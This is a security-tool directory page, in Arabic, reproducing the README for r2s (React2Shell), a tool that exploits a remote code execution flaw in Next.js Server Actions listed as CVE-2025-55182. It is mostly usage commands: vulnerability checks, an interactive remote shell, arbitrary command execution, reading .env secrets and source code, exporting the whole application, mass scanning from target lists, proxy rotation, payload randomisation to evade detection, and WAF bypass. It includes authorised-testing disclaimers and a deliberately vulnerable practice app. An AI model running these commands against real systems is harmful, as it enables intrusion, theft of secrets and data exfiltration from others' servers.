Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
r2s — أداة متقدمة لاختبار الأمان لتقييم ثغرة CVE-2025-55182 في تطبيقات Next.js. تتضمن شلًا تفاعليًا، وفحصًا جماعيًا، وتجاوز WAF، وتقارير شاملة. | Kitploit
أدوات/GitHubGitHub/zamdevio/r2s
ماسحات الثغرات الأمنيةتوليد الحمولةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتتجاوز WAFاختبار الاختراقالقيادة والسيطرة
GitHubzamdevio/r2s

r2s

أداة متقدمة لاختبار الأمان لتقييم ثغرة CVE-2025-55182 في تطبيقات Next.js. تتضمن شلًا تفاعليًا، وفحصًا جماعيًا، وتجاوز WAF، وتقارير شاملة.

عرض المستودع
2منذ 8 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
الموقع الإلكتروني

React2Shell (R2S) - أداة اختبار CVE-2025-55182

R2S Banner Python License

أداة متقدمة لاختبار الاستغلال لتقييم الثغرة CVE-2025-55182

الميزات • التثبيت • الاستخدام • بيئة الاختبار • إخلاء المسؤولية القانوني


📖 ما هو R2S؟

R2S (React2Shell) هي أداة لاختبار الأمان صُممت لمساعدة باحثي الأمان والمطورين ومختبري الاختراق في تقييم ما إذا كانت تطبيقات Next.js الخاصة بهم معرّضة للثغرة CVE-2025-55182.

فهم CVE-2025-55182

CVE-2025-55182 هي ثغرة حرجة تؤثر على Server Actions في Next.js في إصدارات معينة (مثل 16.0.5). تسمح هذه الثغرة للمهاجمين بتنفيذ أوامر تعسفية على الخادم عبر Server Actions غير المؤمَّنة بشكل صحيح، مما يؤدي إلى تنفيذ التعليمات البرمجية عن بُعد (RCE).

يساعدك R2S في التحقق مما إذا كان تطبيقك يعاني من هذه المشكلة حتى تتمكن من إصلاحها قبل أن يكتشفها المهاجمون.


⚠️ ملاحظات مهمة

علامة أوامر Windows (--windows)

⚠️ تحذير حرج: قد تؤدي علامة --windows إلى فشل الأداة في تحديد وجود الثغرة إذا استُخدمت بشكل غير صحيح.

  • السلوك الافتراضي: تستخدم الأداة أوامر Unix/Linux (معظم خوادم Next.js تعمل على Linux)
  • متى تستخدم --windows: فقط إذا كنت متأكدًا 100% أن الخادم المستهدف يعمل بنظام Windows
  • ماذا يحدث إذا كان الاستخدام خاطئًا: إذا استخدمت --windows على خادم Linux، ستفشل الأوامر وقد تُبلغ الأداة بأنها "غير معرّضة للثغرة" حتى لو كان الخادم معرّضًا لها
  • أفضل ممارسة: دع الأداة تكتشف النظام تلقائيًا، أو لا تستخدم --windows إلا إذا كنت تعلم أن الهدف يعمل بنظام Windows

مثال:```bash

❌ WRONG - Using --windows on a Linux server

r2s -u http://linux-server.com -t --windows

Result: Commands fail, tool may report "not vulnerable" (FALSE NEGATIVE)

✅ CORRECT - Let tool use default Unix/Linux commands

r2s -u http://linux-server.com -t

Result: Proper detection of vulnerability

root@kitploit:~
---

## ⚠️ إخلاء مسؤولية قانوني

**هام: اقرأ هذا قبل استخدام هذه الأداة**

1. **هذه الأداة مخصصة لاختبارات الأمان المشروعة فقط**
   - ✅ اختبر تطبيقاتك الخاصة
   - ✅ اختبر التطبيقات التي لديك إذن كتابي لاختبارها
   - ✅ للأغراض التعليمية والبحث الأمني
   - ❌ **لا تستخدمها أبدًا على أنظمة لا تملكها أو ليس لديك إذن لاختبارها**
   - ❌ **لا تستخدمها أبدًا لأغراض ضارة**

2. **باستخدامك لهذه الأداة، فإنك توافق على ما يلي:**
   - لن تستخدمها إلا على الأنظمة التي تملكها أو التي لديك إذن كتابي صريح لاختبارها
   - أنك تدرك أن الوصول غير المصرح به إلى أنظمة الحاسوب غير قانوني
   - أنك تتحمل المسؤولية الكاملة عن أفعالك
   - المؤلفون غير مسؤولين عن أي إساءة استخدام لهذه الأداة

3. **العواقب القانونية:**
   - الوصول غير المصرح به إلى أنظمة الحاسوب جريمة في معظم البلدان
   - قد تتعرض لتهم جنائية وغرامات والسجن
   - احصل دائمًا على إذن كتابي قبل الاختبار

4. **هذه الأداة مقدمة "كما هي" دون أي ضمان من أي نوع**

**إذا كنت دون سن 18، فتأكد من وجود إشراف وإذن من شخص بالغ قبل استخدام هذه الأداة.**

---

## ✨ الميزات

### القدرات الأساسية
- 🔍 **اكتشاف الثغرات الأمنية** - اختبر بسرعة ما إذا كان الخادم عرضة للثغرة CVE-2025-55182
- 💻 **واجهة أوامر تفاعلية** - جلسة واجهة أوامر تفاعلية كاملة عبر HTTPS مع سجل الأوامر
- 📁 **عمليات الملفات** - سرد الدلائل، وقراءة الملفات، وتصدير الملفات/الأرشيفات
- 🔐 **استخراج الأسرار** - محاولة قراءة أسرار التطبيق (ملفات .env، ملفات الإعدادات)
- 📄 **استخراج الكود المصدري** - محاولة قراءة الكود المصدري للتطبيق
- 🖥️ **معلومات النظام** - جمع معلومات نظام التشغيل، اسم المضيف، المستخدم، ومتغيرات البيئة

### الميزات المتقدمة
- 🚀 **الحمولات المُسخَّنة تلقائيًا** - تحسين الحمولات تلقائيًا للحصول على أفضل النتائج
- ⚡ **تنفيذ متوازٍ** - تشغيل أوامر متعددة في وقت واحد
- 🎲 **عشوائية الحمولات** - تفادي الاكتشاف باستخدام حمولات ديناميكية
- 🛠️ **وحدات الاستغلال** - نظام وحدات بأسلوب Metasploit (env_dump، file_search، network_scan، process_list)
- 🔄 **معالجة إعادة التوجيه** - تتبع إعادة توجيه HTTP تلقائيًا (301، 302، 303، 307، 308)
- 🎨 **واجهة مستخدم جميلة** - إخراج ملوّن حسب الرموز لسهولة القراءة
- 📊 **تقارير شاملة** - حفظ التقارير تلقائيًا بصيغ JSON وHTML وTXT مع منسّقات خاصة بكل عملية
- ⚙️ **نظام الإعدادات** - إعدادات مبنية على JSON مع لوحة إعدادات تفاعلية
- 📦 **وظيفة التصدير** - تصدير ملفات فردية أو أدلة التطبيق بالكامل كأرشيفات zip
- 🔒 **تجاوز WAF** - تقنيات تجاوز متعددة (⚠️ غير مضمونة - راجع القيود أدناه)

### التقارير والسجلات
- 📝 **حفظ التقارير تلقائيًا** - حفظ التقارير تلقائيًا في `~/.r2s/reports/` مع طوابع زمنية سهلة القراءة
- 📋 **صيغ خاصة بالعمليات** - صيغ تقارير مختلفة لكل عملية (shell، test، secrets، إلخ)
- 📜 **سجل الأوامر** - سجل أوامر دائم محفوظ في `~/.r2s/history`
- 🔍 **مسارات التدقيق** - تسجيل مفصّل لجميع العمليات في `~/.r2s/logs/audit.log`
- 🎨 **تقارير HTML** - تقارير HTML جميلة مع وضع داكن/فاتح، وأزرار نسخ، وكتل أكواد

---

## 📦 التثبيت

### الخيار 1: البناء من المصدر (موصى به)

1. **استنساخ المستودع:**   ```bash
   git clone https://github.com/zamdevio/r2s.git
   cd r2s
  1. تثبيت التبعيات: ```bash pip install -r requirements.txt
    root@kitploit:~
  2. بناء الملف التنفيذي المستقل: ```bash ./build.sh
    root@kitploit:~
  3. التثبيت على النظام (اختياري): ```bash sudo cp dist/r2s /usr/local/bin/ sudo chmod +x /usr/local/bin/r2s
    root@kitploit:~
  4. نظّف مخرجات البناء (اختياري): ```bash

    Remove build/, dist/, pycache/, and other build files

    ./build.sh cleanup
    root@kitploit:~

الخيار 2: استخدم سكربت بايثون مباشرة```bash

Install dependencies

pip install -r requirements.txt

Run directly

python3 -m react2shell.main --help

Or after building:

r2s --help

root@kitploit:~
---

## 🚀 البدء السريع

### اختبار الثغرات الأساسي```bash
# Test if a server is vulnerable
r2s -u http://localhost:3000 -t

# With verbose output for more details
r2s -u http://localhost:3000 -t -v

⚠️ مهم: لا تستخدم --windows إلا إذا كنت متأكدًا أن الهدف يعمل بنظام ويندوز. استخدام --windows على خادم لينكس سيؤدي إلى نتائج سلبية خاطئة (قد تُبلغ الأداة بأن الخادم "غير معرّض للخطر" حتى لو كان معرّضًا بالفعل).

الاختبار مع العرض التجريبي عبر الإنترنت

نوفر بيئة اختبار آمنة في **https://r2s-arena.fly.dev**:```bash

Test the online demo

r2s -u https://r2s-arena.fly.dev -t

root@kitploit:~
### الاختبار محليًا

انظر [`nextjs/README.md`](https://github.com/zamdevio/r2s/blob/HEAD/nextjs/README.md) للحصول على تعليمات تشغيل التطبيق القابل للاستغلال محليًا.

---

## 📚 أمثلة الاستخدام

### مرجع سريع للأوامر

**الأوامر الأكثر شيوعًا:**
- `r2s -u URL -t` - اختبار الثغرة (الأكثر شيوعًا)
- `r2s -u URL --shell` - بدء قشرة تفاعلية
- `r2s --targets FILE -t` - فحص مجمّع لعدة أهداف
- `r2s -u URL --system-info` - الحصول على معلومات النظام
- `r2s -u URL --secrets` - محاولة قراءة الأسرار
- `r2s -u URL --export-archive` - تصدير التطبيق بالكامل كملف zip

**⚠️ تذكّر**: لا تستخدم `--windows` إلا إذا كان الهدف يعمل بنظام ويندوز!

---

### العمليات الأساسية```bash
# Test vulnerability
r2s -u http://localhost:3000 -t

# List directory contents
r2s -u http://localhost:3000 --list-dir /app

# Read files
r2s -u http://localhost:3000 --read-file .env
r2s -u http://localhost:3000 --read-file package.json

# Get system information
r2s -u http://localhost:3000 --system-info

# Execute custom commands
r2s -u http://localhost:3000 --command "whoami"
r2s -u http://localhost:3000 --command "uname -a"

شل تفاعلي```bash

Start interactive shell session

r2s -u http://localhost:3000 --shell

Features:

- Arrow keys for command history (↑/↓)

- Arrow keys for cursor movement (←/→)

- Command aliases: nano/vi/vim/emacs → cat, clear → cls

- Colored file/folder output in ls

- Persistent history saved to ~/.r2s/history

- Auto-save shell session reports

root@kitploit:~
### وحدات الاستغلال```bash
# List available modules
r2s --list-modules

# Use a module
r2s -u http://localhost:3000 --module env_dump

# Use module with options
r2s -u http://localhost:3000 --module file_search --set pattern="*.env" --set path="/app"

# Get module information
r2s --module-info env_dump

ميزة التصدير```bash

Export a single file

r2s -u http://localhost:3000 --export src/app/page.tsx

Saved to: ~/.r2s/exports/{domain}/src/app/page.tsx

Export entire app directory as zip archive

r2s -u http://localhost:3000 --export-archive

What it does:

- Creates a zip archive of the entire app directory on the server

- Automatically excludes files matching .gitignore patterns

- Downloads the archive to your local machine

- Automatically deletes the archive from the server after download

- Saved to: ~/.r2s/exports/{domain}/r2s_export_TIMESTAMP.zip

Note: This operation may take a while for large applications

Configure export directory

r2s settings

Navigate to "export" section and set "export_dir"

root@kitploit:~
### الأسرار واستخراج الأكواد```bash
# Attempt to read application secrets
r2s -u http://localhost:3000 --secrets
# Tries: .env, .env.local, .env.production, config.json, etc.

# Attempt to read application source code
r2s -u http://localhost:3000 --code
# Tries: src/**/*.ts, src/**/*.tsx, src/**/*.js, etc.

المسح الدفعي (أهداف متعددة)```bash

Scan multiple targets from file (one URL per line)

r2s --targets targets.txt -t

Batch mode: no interactive prompts, auto-continue

r2s --targets targets.txt --batch -t

Scan with rate limiting (2 requests per second)

r2s --targets targets.txt -t --rate 2

Add delay between targets (1 second)

r2s --targets targets.txt -t --delay 1

Combine options for safe batch scanning

r2s --targets targets.txt --batch -t --rate 1 --delay 2

root@kitploit:~
### الخيارات المتقدمة```bash
# Parallel execution (run multiple commands simultaneously)
r2s -u http://localhost:3000 --parallel 5 --command "whoami;id;uname -a"

# WAF bypass (⚠️ Not guaranteed - see limitations below)
r2s -u http://localhost:3000 -t --waf-bypass

# Auto-warm payloads (optimize payloads before execution)
r2s -u http://localhost:3000 -t --auto-warm

# Randomize payloads (evade static detection)
r2s -u http://localhost:3000 --command "whoami" --randomize

# Different header strategies
r2s -u http://localhost:3000 -t --header-strategy chrome_latest
# Options: default, chrome_latest, firefox, minimal, assetnote

# Custom timeout (0 = no timeout)
r2s -u http://localhost:3000 --command "long-running-command" --timeout 0

# Disable SSL verification
r2s -u https://target.com -t --insecure

# Rate limiting (requests per second)
r2s -u http://localhost:3000 -t --rate 2

# Delay between requests (seconds)
r2s -u http://localhost:3000 --command "whoami" --delay 1

خيارات البروكسي والشبكة```bash

Use HTTP proxy

r2s -u http://localhost:3000 -t --proxy http://proxy.example.com:8080

Use proxy with authentication

r2s -u http://localhost:3000 -t --proxy http://user:[email protected]:8080

Load and rotate proxies from file (one proxy per line)

r2s -u http://localhost:3000 -t --proxy-file proxies.txt

Rate limiting with proxy rotation

r2s --targets targets.txt -t --proxy-file proxies.txt --rate 1

root@kitploit:~
### التسجيل والتدقيق```bash
# Log all operations to specific file
r2s -u http://localhost:3000 -t --log r2s_session.log

# Create detailed audit trail (saved to ~/.r2s/logs/audit.log)
r2s -u http://localhost:3000 -t --audit

# Combine logging with batch scanning
r2s --targets targets.txt --batch -t --log batch_scan.log --audit

الإعدادات والتهيئة```bash

Open interactive settings panel

r2s settings

Configure:

- Report formats (JSON, HTML, TXT per operation)

- Auto-save reports (on/off)

- Export directory

- Default timeouts

- And more...

Clean up all tool data

r2s cleanup

Removes: config, history, logs, reports, exports

Uninstall the tool (standalone binaries only)

r2s uninstall

root@kitploit:~
### الإبلاغ```bash
# Reports are auto-saved to ~/.r2s/reports/ by default
# Format: {operation}_{YYYYMMDD_HHMMSS}.{json,html,txt}

# Disable auto-save
r2s -u http://localhost:3000 -t --no-report

# Save to specific location (disables auto-save)
r2s -u http://localhost:3000 -t --output /path/to/report.json

# View reports
ls ~/.r2s/reports/
cat ~/.r2s/reports/test_20251206_120000.html

🎯 حالات الاستخدام الشائعة

1. اختبار تطبيقك الخاص```bash

Start your Next.js app

cd my-nextjs-app npm run dev

In another terminal, test it

r2s -u http://localhost:3000 -t

root@kitploit:~
### 2. تدقيق الأمان```bash
# Comprehensive security check
r2s -u http://localhost:3000 -t --waf-bypass
r2s -u http://localhost:3000 --system-info
r2s -u http://localhost:3000 --secrets
r2s -u http://localhost:3000 --code
r2s -u http://localhost:3000 --export-archive

3. الاختبار التعليمي

استخدم تطبيق nextjs المرفق لإجراء اختبار آمن ومحلي:```bash cd nextjs npm install npm run dev

Test in another terminal

r2s -u http://localhost:3000 -t

root@kitploit:~
انظر [`nextjs/README.md`](https://github.com/zamdevio/r2s/blob/HEAD/nextjs/README.md) للحصول على تعليمات مفصّلة.

---

## 🏗️ البنية المعمارية

تستخدم R2S بنية معيارية لسهولة الصيانة وقابلية التوسّع:```
react2shell/
├── main.py              # Main entry point
├── classes/             # Core classes
│   ├── detector.py     # Target detection
│   ├── executor.py     # Command execution
│   ├── modules.py      # Exploit modules system
│   ├── operations.py   # High-level operations
│   ├── payload.py      # Payload building and randomization
│   └── shell.py        # Interactive shell
├── services/            # Services
│   ├── config.py       # Configuration management (JSON)
│   ├── exporter.py     # File and archive export
│   ├── formatters.py   # Report formatters
│   ├── history.py      # Command history
│   ├── logger.py       # Logging and audit trails
│   ├── proxy.py        # Proxy management
│   └── reporter.py     # Report generation
└── utils/              # Utilities
    ├── colors.py       # Color utilities
    └── helpers.py      # Helper functions

انظر react2shell/README.md للحصول على توثيق معماري مفصّل.


🧪 بيئة الاختبار

نوفّر بيئة اختبار آمنة تُسمى nextjs يمكنك استخدامها لاختبار الأداة دون تعريض الأنظمة الحقيقية للخطر.

عرض تجريبي عبر الإنترنت

قم بزيارة: https://r2s-arena.fly.dev

هذا تطبيق متاح للعموم وهو معرّض للثغرات عمدًا لأغراض الاختبار فقط.

الاختبار المحلي

انظر nextjs/README.md للحصول على تعليمات تشغيله محليًا.

⚠️ مهم: تطبيق nextjs معرّض للثغرات عمدًا ويجب أبدًا استخدامه في بيئة الإنتاج أو مع بيانات حقيقية.


📖 مرجع الأوامر

الأوامر الأساسية

أوامر التصدير

CommandDescription
--export FILE, --ex FILEتصدير ملف واحد من الهدف (يُحفظ في ~/.r2s/exports/{domain}/)
--export-archiveتصدير كامل مجلد التطبيق كأرشيف zip. ينشئ ملف zip على الخادم، ينزّله، ثم يحذفه من الخادم. يستثني أنماط .gitignore. يُحفظ في ~/.r2s/exports/{domain}/r2s_export_TIMESTAMP.zip

أوامر الوحدات

CommandDescription
--module NAMEتنفيذ وحدة استغلال
--module-list, --list-modulesعرض الوحدات المتاحة

الخيارات المتقدمة

خيارات إعداد التقارير

OptionDescription
--output FILE, -o FILEاحفظ النتائج في ملف محدد (يعطّل الحفظ التلقائي)

خيارات الشبكة والوكيل

خيارات الدُفعات والأتمتة

OptionDescription
--targets FILEامسح أهدافًا متعددة من ملف (URL واحد لكل سطر، يدعم التعليقات باستخدام #)
--batchوضع الدُفعات: تخطَّ جميع المطالبات التفاعلية، والمتابعة التلقائية (مفيد للأتمتة/البرامج النصية)

أوامر خاصة

CommandDescription
r2s settingsفتح لوحة الإعدادات التفاعلية
r2s cleanupحذف جميع بيانات R2S (الإعدادات، السجل، السجلات، التقارير، الصادرات)

🔧 استكشاف الأخطاء وإصلاحها

"SSL Error"```bash

Use --insecure flag to bypass SSL verification

r2s -u https://target.com -t --insecure

root@kitploit:~
### "خطأ في الاتصال"
- تحقق من أن الخادم يعمل
- تحقق من صحة عنوان URL
- تحقق من إعدادات جدار الحماية
- جرّب زيادة المهلة: `--timeout 30`

### "تم حظر الطلب"```bash
# Try WAF bypass (⚠️ Not guaranteed - see WAF Bypass Limitations below)
r2s -u https://target.com -t --waf-bypass

# Try different header strategies
r2s -u https://target.com -t --header-strategy chrome_latest
r2s -u https://target.com -t --header-strategy firefox

"تعذر تحديد الثغرة" أو النتائج السلبية الكاذبة

⚠️ هام: علامة أوامر Windows

إذا كنت تحصل على نتائج سلبية كاذبة (الأداة تقول "غير معرضة" لكن الهدف في الواقع معرض)، تحقق من:

  1. هل استخدمت علامة --windows؟

    • علامة --windows تجعل الأداة تستخدم أوامر Windows (PowerShell، dir، إلخ.)
    • إذا كان هدفك Unix/Linux (معظم خوادم Next.js كذلك)، فإن استخدام --windows سيؤدي إلى فشل الأداة
    • ستحاول الأداة تنفيذ أوامر Windows على خادم Linux، وسيفشل ذلك
    • الحل: أزل علامة --windows (Unix/Linux هو الافتراضي)
  2. كشف المنصة

    • تكتشف الأداة المنصة تلقائيًا، لكن يمكنك تجاوز ذلك
    • استخدم --windows فقط إذا كنت متأكدًا 100% أن الهدف يعمل بنظام Windows
    • معظم عمليات نشر Next.js تكون على أنظمة Linux/Unix
  3. أمر الاختبار

    • الاختبار الافتراضي يستخدم أمر Unix: echo $((41*271))
    • مع --windows، يستخدم: powershell -c "41*271"
    • إذا كان الخادم Linux لكنك تستخدم أوامر Windows، سيفشل الاختبار

مثال على المشكلة:```bash

❌ WRONG - This will fail if target is Linux

r2s -u http://linux-server.com -t --windows

✅ CORRECT - Let tool auto-detect or use default (Unix/Linux)

r2s -u http://linux-server.com -t

root@kitploit:~
### قيود تجاوز WAF

**⚠️ مهم:** تقنيات تجاوز WAF في هذه الأداة **غير مضمونة** للعمل ولها عدة قيود:

- **ليست عالمية**: تستخدم أنظمة WAF المختلفة طرق كشف مختلفة. ما ينجح مع أحدها قد لا ينجح مع آخر.
- **الكشف الثابت**: تستخدم بعض أنظمة WAF مطابقة الأنماط الثابتة التي يمكن تجاوزها، لكن أنظمة WAF الحديثة تستخدم التحليل السلوكي.
- **تحديد المعدل**: تطبق العديد من أنظمة WAF تحديد المعدل الذي يمكن أن يحظر المحاولات المتكررة.
- **التعلم الآلي**: تستخدم أنظمة WAF المتقدمة نماذج التعلم الآلي التي تتكيف وتتعلم من أنماط الهجمات.
- **Cloudflare/AWS WAF**: أنظمة WAF على مستوى المؤسسات (Cloudflare وAWS WAF وغيرها) صعبة التجاوز للغاية.
- **لا توجد ضمانات**: تقنيات التجاوز تجريبية وقد تفشل ضد أنظمة WAF جيدة التكوين.

**أفضل الممارسات:**
- استخدم تجاوز WAF كخيار أخير
- جرّب استراتيجيات ترويسات مختلفة (`--header-strategy`)
- ادمجها مع `--randomize` للحصول على نتائج أفضل
- افهم أن بعض الأهداف قد يكون من المستحيل تجاوزها
- اختبر دائمًا على الأنظمة التي تملكها أو لديك إذن باختبارها

### مشكلات البناء```bash
# Make sure Python 3.7+ is installed
python3 --version

# Install dependencies
pip install -r requirements.txt

# Clean previous build artifacts
./build.sh cleanup

# Try building again
./build.sh

تنظيف نواتج البناء

لإزالة جميع نواتج البناء بأمان (مجلدات البناء، ملفات الذاكرة المؤقتة، وما إلى ذلك):```bash ./build.sh cleanup

root@kitploit:~
سيؤدي هذا إلى إزالة ما يلي:
- دليل `build/` (ملفات بناء PyInstaller)
- دليل `dist/` (ملفات ثنائية مترجمة)
- أدلة `__pycache__/` (ذاكرة التخزين المؤقت لبايثون، بشكل متكرر)
- ملفات `*.pyc` (الكود البايتي المترجم لبايثون)
- ملفات `*.pyo` (الكود البايتي المحسّن لبايثون)
- ملفات `*.spec` (ملفات مواصفات PyInstaller)

**ملاحظة:** هذا يزيل نواتج البناء فقط، وليس الكود المصدري الخاص بك. عملية التنظيف آمنة وستطلب التأكيد قبل المتابعة.

---

## 📁 هيكل الملفات```
r2s/
├── README.md                 # This file
├── LICENSE                   # MIT License
├── requirements.txt          # Python dependencies
├── build.sh                  # Build script for standalone binary
├── r2s_entry.py              # PyInstaller entry point
├── react2shell/              # Main package
│   ├── README.md            # Architecture documentation
│   ├── main.py              # Entry point
│   ├── classes/             # Core classes
│   ├── services/            # Services
│   └── utils/               # Utilities
└── nextjs/                   # Testing environment
    └── README.md            # Testing environment documentation

🤝 المساهمة

المساهمات مرحّب بها! يرجى:

  1. عمل Fork للمستودع
  2. إنشاء فرع ميزة (feature branch)
  3. إجراء التعديلات
  4. تقديم طلب سحب (pull request)

تذكّر: ساهم فقط بالكود الذي يساعد في الاختبارات الأمنية المشروعة.


📝 الترخيص

هذا المشروع مرخّص بموجب رخصة MIT - راجع ملف LICENSE للتفاصيل.

ومع ذلك، فإن استخدام هذه الأداة يخضع لإخلاء المسؤولية القانوني أعلاه. استخدام هذه الأداة للوصول غير المصرح به غير قانوني ولا يغطيه هذا الترخيص.


👨‍💻 المطوّر

zamdevio

  • GitHub: https://github.com/zamdevio
  • مستودع المشروع: https://github.com/zamdevio/r2s

🙏 شكر وتقدير

  • الباحثون الأمنيون الذين اكتشفوا CVE-2025-55182
  • مجتمع الأمن مفتوح المصدر
  • جميع المساهمين في هذا المشروع

📞 الدعم

  • القضايا (Issues): GitHub Issues
  • الأمان: أبلغ عن القضايا الأمنية بمسؤولية

⚠️ تذكير أخير

هذه الأداة مخصّصة لأغراض الاختبارات الأمنية والتعليم فقط.

  • ✅ احصل دائمًا على إذن قبل الاختبار
  • ✅ اختبر فقط الأنظمة التي تملكها أو لديك إذن باختبارها
  • ✅ استخدم الأداة بمسؤولية وأخلاقية
  • ❌ لا تستخدمها أبدًا لأغراض خبيثة
  • ❌ لا تختبر أي أنظمة دون إذن

ابقَ قانونيًا، وابقَ أخلاقيًا، وابقَ آمنًا! 🛡️


صُنع بكل ❤️ من أجل مجتمع الأمن

⬆ العودة إلى الأعلى

تنزيل الأداة
CommandDescription
-u, --url URLURL الهدف (مطلوب لمعظم العمليات)
-t, --testاختبر ما إذا كان الخادم معرّضًا للثغرات
-ld, --list-dir PATHاعرض محتويات المجلد
-rf, --read-file FILEاقرأ محتويات الملف
-si, --system-infoاحصل على معلومات النظام
-sr, --secretsحاول قراءة الأسرار
-c, --codeحاول قراءة الكود المصدري
-cmd, --command CMDتنفيذ أمر مخصص
--shellبدء قشرة تفاعلية
--module-info NAMEعرض معلومات الوحدة
--set KEY=VALUEتعيين خيار من خيارات الوحدة
OptionDescription
--waf-bypassجرّب تقنيات تجاوز جدار الحماية WAF (⚠️ غير مضمون - راجع القيود أدناه)
--waf-bypass-size KBحجم بيانات الحشو لتجاوز WAF بالكيلوبايت (الافتراضي: 128)
--vercel-waf-bypassتفعيل تقنيات تجاوز WAF الخاصة بـ Vercel
--header-strategy STRATEGYاستراتيجية ترويسات HTTP: default, chrome_latest, firefox, minimal, assetnote
--parallel Nتنفيذ N من الأوامر بالتوازي (مفيد لعدة أوامر)
--auto-warmتسخين الحمولات وتحسينها تلقائيًا قبل التنفيذ
--randomizeعشوائية الحمولات لتفادي الكشف الثابت
--no-follow-redirectsلا تتبع إعادة التوجيه HTTP تلقائيًا (301, 302, إلخ.)
-k, --insecureتعطيل التحقق من شهادة SSL (استخدم بحذر)
--timeout SECONDSمهلة الطلب بالثواني (الافتراضي: 10، استخدم 0 لعدم وجود مهلة)
--windows⚠️ تحذير: استخدم أوامر Windows بدلاً من Unix/Linux. قد يتسبب ذلك في فشل الأداة في تحديد الثغرة إذا كان الهدف فعليًا Unix/Linux. استخدم هذا فقط إذا كنت متأكدًا أن الهدف يعمل بنظام Windows.
--rate RATEحدد الطلبات إلى RATE طلبًا في الثانية (مفيد للمسح الجماعي)
--delay SECONDSأضف تأخيرًا بين الطلبات بالثواني (يساعد في تجنب تحديد المعدل)
--batchوضع الدُفعات: تخطَّ جميع المطالبات التفاعلية، والمتابعة التلقائية (مفيد للأتمتة)
--no-report
تعطيل الحفظ التلقائي للتقرير في ~/.r2s/reports/
--log FILEسجّل جميع العمليات في الملف المحدد (سجل عمليات مفصّل)
--auditإنشاء سجل تدقيق مفصّل (يُحفظ في ~/.r2s/logs/audit.log)
OptionDescription
--proxy URLاستخدم وكيل HTTP (الصيغة: http://proxy:port أو http://user:pass@proxy:port)
--proxy-file FILEتحميل الوكلاء وتدويرها من ملف (وكيل واحد لكل سطر، الصيغة: http://proxy:port)
--rate RATEحدد الطلبات إلى RATE طلبًا في الثانية (يمنع إغراق الهدف)
--delay SECONDSأضف تأخيرًا بين الطلبات بالثواني (يساعد في تجنب تحديد المعدل)
r2s uninstallإلغاء تثبيت برنامج R2S وجميع البيانات
r2s helpعرض رسالة المساعدة